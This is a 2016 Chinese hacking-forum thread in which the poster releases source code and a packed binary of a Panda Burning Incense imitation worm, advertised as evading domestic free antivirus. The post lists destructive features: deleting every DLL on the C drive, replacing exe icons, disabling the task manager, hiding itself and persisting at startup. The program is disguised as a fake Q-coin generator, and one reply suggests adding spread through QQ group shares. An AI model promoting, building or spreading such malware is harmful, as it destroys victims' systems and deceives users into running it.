吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[其他原创] 【原创源码】+熊猫烧香(过任何国内免费杀毒)

狂暴补师亚丝娜 发表于 2016-3-21 10:19

{:1_914:}我回来啦。
首先,先说一下:

感谢论坛:http://www.52pojie.cn/thread-476956-1-1.html
楼主的个人介绍:http://www.52pojie.cn/thread-456897-1-1.html

声明:此源码是C++编写,不是网上的源码,更不是楼主拿其他的源码来秀!相信吾爱的大神见多识广,一眼就能看出来是不是原创~
请不要拿着源码做坏事,谢谢!启动项是我故意写上去的,防止大家不小心点了按钮,杀毒提示的时候点拒绝,此工具就无效了!

被卡巴斯基查杀了= =好吧,我没考虑到收费杀软。

有人说图标没有被替换,原因是我替换图标使用的相对路径,请确定图标的资源是否存在。
否则替换不成功。具体请看源码。

这是界面: 123456.png

先说一下:我故意不把界面写得怎么样,害怕有人拿成品滥用。所以故意写成“刷QB”这种完全骗人的东西。
其次,就算开着杀毒(包括360),也不要点按钮,不然后果自负!
加壳用的upx,也不会报毒,所以任何以【加壳】为原因叫你关闭杀毒的均不可信。

再来说说功能:功能的话模仿了熊猫烧香大多数功能,去除了杀毒软件会直接查杀的功能(比如:强制结束某些进程)

此版本的功能:
1、替换所有C盘的exe文件的图标资源。(比来想说把所有的PE文件头换了,但是为了防止恶意分子,所以没写这个功能)
2、拷贝自身到指定目录。
3、删除C盘所有的DLL,导致系统无法正常运行。
4、添加自身为启动项。-杀毒软件会提示哦,好吧,这是我故意加的。
5、打开指定网址。(我这里写的是百度,但是如果改成其他网页,大家懂的
6、禁用文件夹选项
7、禁用任务管理器
8、隐藏自身界面,并设置自身属性为隐藏。(隐藏无法通过属性修改)
9、打开网页后windows自带游览器会受到影响,无法自动游览。但是可以通过右键任务栏关闭。(故意没hook任务栏,大家懂的)

楼主使用的VS2012编写,VC可能存在一些问题吧。楼主没用过VC。

如何关闭此工具:使用360的任务管理器关闭即可。
大家要测试请在虚拟机或者影子模式下测试,请勿拿此工具挑战你的电脑或者杀毒软件。

高级工具源码.7z (77.81 KB, 下载次数: 1020) 成品.7z (2.52 MB, 下载次数: 2078)

别问我为什么这么贵=,=大家懂的。
哈勃杀毒报告:https://habo.qq.com/file/showdet ... pk=ADQGYF1lB2UIO1s0
火眼:http://fireeye.ijinshan.com/anal ... 01e365f&type=1#full

不过本人技术有限,比如想写出:自动上传到群共享,但是不知道怎么写,不知道他们易语言的病毒自动上传到群共享是怎么写的。感觉好高级的样子。好吧,慢慢学习。

大家如果不信可以拿360等杀毒工具运行。
360只会提示只有一个有程序正在修改启动项,那是我故意加的!
有本事点允许挑战挑战=。=

H大在360.。目测已被和谐  发表于 2016-3-21 11:05

免费评分

kevin_zcwen + 1 + 1 谢谢@Thanks!
影风、雷凌 + 1 + 1 太强了。有空更新么
俊之霜 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
netCheney + 1 + 1 很吊的样子,试试
华凌666 + 1 + 1 热心回复!
慧翼 + 1 + 1 谢谢@Thanks!
lovekin + 1 + 1 谢谢@Thanks!
Alex_vk + 1 + 1 我很赞同!厉害
牧濑伊莉雅 + 1 + 1 我很赞同!
cz226 + 1 + 1 热心回复!
00011011 + 1 + 1 我很赞同!
ylb521 + 1 + 1 我很赞同!
supersoar + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
CrestKing + 1 热心回复!
Crazy丨Man + 1 确实 不错
was1369548d + 1 热心回复!
Ervin + 1 鼓励转贴优秀软件安全工具和文档!
上善若水丶 + 1 鼓励转贴优秀软件安全工具和文档!
艾解CHO + 1 厉害了Word哥哥
靓丽轩 + 1 热心回复!
mingo + 1 谢谢@Thanks!
灰太狼大王 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
H1N2 + 1 已经处理,感谢您对吾爱破解论坛的支持!
w18749195 + 1 热心回复!
圈瞳 + 1 用心讨论,共获提升!
lyly125 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
辞年小妖 + 1 我很赞同!
z741571 + 1 跪舔一发~
岩井西衣 + 1 我很赞同!
nicky1215 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
冰柠嘿嘿 + 1 我只想说 国内的杀软都是辣鸡
浴水凤凰 + 1 膜拜大神
kalkinx + 1 好东西,学习了
劍縱大湿胸 + 1 热心回复!
fa00x + 1 热心回复!
小呀苹果 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
bie.ren + 1 感觉很强大的样子
青衣惆怅 + 1 路边进修了段时间这么6了
Kuso + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
nooon000 + 1 已答复!
风霜 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
我不吃西红柿 + 1 虽然我不懂,但是感觉蛮666的
qinhaogang + 1 谢谢@Thanks!虽然不懂这是干嘛的 还是感.
courageous + 1 鼓励转贴优秀软件安全工具和文档!
q15045844442 + 1 我很赞同!
Cizel + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
Facksxx + 1 我很赞同!
lindian + 1 谢谢解答!
geeky + 1 厉害,可是为什么故意启动项?
呆鹏网络 + 1 用心讨论,共获提升!
姜不辣 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
我是你姐夫 + 1 感觉好屌

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

楼主| 狂暴补师亚丝娜 发表于 2016-4-20 18:12
很多人说没有替换图标的效果,是因为我使用的是相对路径!!请把压缩包里面所有的东西都解压出来!!!而不是只弄exe!
gchq2005 发表于 2016-3-23 14:15
807847379 发表于 2016-3-23 13:36
http://r.virscan.org/report/b2e00c3fa5d77ffb65ce8d7e7b759e8e

只有两个,你有什么要说的吗?

第一、我想说的是,我没说你的不能过杀毒软件,也许能过几个,过全部杀毒软件,话太满了,就是吹牛!改主题是你自己打自己脸的吧,,国内有多少杀毒软件还真不清楚,有些不出名的也许反而更能杀出来。
第二、我更没有不尊重别人劳动成果,我只是不喜欢有点小成就了,就感觉自己牛得不行,打遍天下无敌手。
第三、下载币5个,这是你的权利,高下载币交流学习论坛有些相左?这就是我怀疑你的用意?
第四、说到高亮,人气,那就更好说了,你没有违规,当然不会有举报。
山顶的一棵草 发表于 2016-3-21 19:35
过任何杀毒   我老司机第一个不服!

司机测试。
运行不杀,填个1玩玩。
帅不过三秒?
尝试不重启清除。
继续。
回滚了创建文件和注册表。
图标资源也都在,就是高级工具.exe不见了

标题改成了 :过国内免费杀毒了。哈哈哈  发表于 2016-3-21 20:01
 楼主| 狂暴补师亚丝娜 发表于 2016-3-21 10:21
再次重申:请不要拿自己的电脑或者杀毒挑战本程序。通过火眼,哈勃等工具均无报毒!
一定要使用影子模式或者虚拟机!
zdxojiji 发表于 2016-3-21 10:25
好厉害的样子,
飞豆豆 发表于 2016-3-21 10:25
是真的么,有这么强?
lfxxx 发表于 2016-3-21 10:26
虽然不懂 还是要支持下 辛苦了
haosma 发表于 2016-3-21 10:28

好厉害的样子
倾城堕三界 发表于 2016-3-21 10:28
读内存,筛选QQ,将群共享的服务器IP 截取 然后发送就可以了
 楼主| 狂暴补师亚丝娜 发表于 2016-3-21 10:28
飞豆豆 发表于 2016-3-21 10:25
是真的么,有这么强?

你可以下载试一试。
头像被屏蔽
haiyang457 发表于 2016-3-21 10:29
丶小蓝丶 发表于 2016-3-21 10:30
貌似好强的